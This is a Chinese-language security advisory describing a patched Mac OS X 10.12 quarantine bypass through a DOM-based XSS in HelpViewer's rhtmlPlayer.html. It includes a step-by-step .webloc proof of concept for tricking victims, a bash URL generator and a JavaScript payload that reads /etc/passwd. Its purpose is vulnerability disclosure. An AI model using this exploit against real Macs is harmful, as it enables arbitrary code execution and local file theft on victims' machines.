SSD安全公告 – Mac OS X 10.12隔离机制绕过漏洞

漏洞概要
Mac OS X存在一个漏洞,该漏洞允许攻击者绕过Apple的隔离机制,不受任何限制执行任意JavaScript代码.
漏洞提交者
来自WeAreSegment的安全研究者Filippo Cavallarin向Beyond Security的SSD报告了该漏洞.
厂商响应
苹果公司已于2017年6月27日收到了我们的报告,并和我们进行了多次沟通。苹果公司通知我们,在即将发布的High Sierra操作系统中会修补这个漏洞。这之后,苹果公司再没有提供任何其他信息 – 既没有链接公告,也没有提供关于CVE编号分配的任何信息.
我们已经验证在Mac OS X High Sierra中已不存在该漏洞。对于该漏洞的解决办法是升级到Mac OS X High Sierra,或者移除rhtmlPlayer.html文件修复该漏洞.

漏洞详细信息
苹果隔离机制的运行原理是在下载的文件上设置一个扩展属性(从已下载的归档文档/图片提取的文件也适用),以便系统在受限制的环境中打开/执行这些文件.
例如,一个被隔离的HTML文件不能加载本地资源.
此漏洞存在于一个html文件(Mac OS X内核的一部分)中,容易受到基于DOM的XSS攻击,允许在其(无限制)上下文中执行任意JavaScript命令.
上述文件的具体路径为:/System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
文件包含如下代码:

<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
  [...]
  rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
  [...]
  self.contentHttpReq.open('GET', rHTMLPath, true);
  self.contentHttpReq.onreadystatechange = function() {
      if (self.contentHttpReq.readyState == 4) {
          loadTutorial(self.contentHttpReq.responseText);
      }
  }
  [...]
}
function loadTutorial(response) {
  var rHTMLPath = urlParam("rhtml");
  // this will create a tutorialData item
  eval(response);
  [...]
}
function loadLocStrings()
{
  var headID = document.getElementsByTagName("head")[0];
  var rHTMLPath = urlParam("rhtml");
  rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
  var newScript = document.createElement('script');
  newScript.type = 'text/javascript';
  newScript.src = rHTMLPath;
  headID.appendChild(newScript);
}
[...]
</script>

简而言之,这段代码从“rhtml”查询字符串参数中提取URL地址,向该URL发出请求,并将响应数据作为JavaScript代码加以执行.
下面的代码包含两段不同的基于DOM的XSS的代码。第一个是在loadLocStrings()函数中创建一个SCRIPT元素,并使用“rhtml”参数作为其“src”属性。第二个是在init()函数中使用“rhtml”参数进行ajax调用,然后将响应直接传递给eval()。这样做的结果是同样的载荷被执行两次.
攻击者通过提供一个uri,就可以控制响应数据,进而获得代码执行.
通过使用.webloc文件是一种可能的漏洞利用方式。基本上这些文件都包含一个URL,他们只需在Safari中加载即可。通过构造一个.webloc文件,并诱导受害者打开,攻击者就可以在受害者的计算机上以高权限执行JavaScript命令.
由于.webloc文件同样使用扩展属性来存储数据,因此攻击者必须将文件打包放在tar文件中(或其他任何支持扩展属性的文件格式)中.
漏洞证明
通过以下步骤复现漏洞

  1. 创建一个你想要要在目标上执行的JavaScript文件
  2. 使用base64对文件内容编码
  3. 将其编码为“uri组件”(比如,使用js的encodeURIComponent函数完成这个任务)
  4. 使用它来构造如下形式的uri:data:text / plain; base64,
  5. 在开头添加如下字符串:file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml =
  6. 使用Safari打开它
  7. 将其另存为书签
  8. 将该书签拖放到Finder中(此时会创建一个.webloc文件,如果扩展名不是.webloc,重命名为.webloc)
  9. 创建一个包含.webloc文件的tar归档文件
  10. 将归档文件发送给受害者

请注意,受限于rhtmlPlayer.html的处理流程,为了访问本地资源,JavaScript代码的第一行必须是:

document.getElementsByTagName("base")[0].href="";

以下bash脚本会将JavaScript文件转换为最终的“文件”URL:

BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml="
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
  echo "usage: $0 <jsfile>"
  exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF

以下Javascript代码可以在受害者机器上显示/ etc / passwd文件内容:

BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
 if (xhr.readyState == 4) {
  alert(xhr.responseText);
 }
};
xhr.send();
EOF

请注意,只有Safari才能通过ajax成功加载本地资源(Chrome和Firefox不行)。然而在漏洞利用中,这不是问题,因为.webloc文件总是使用Safari打开.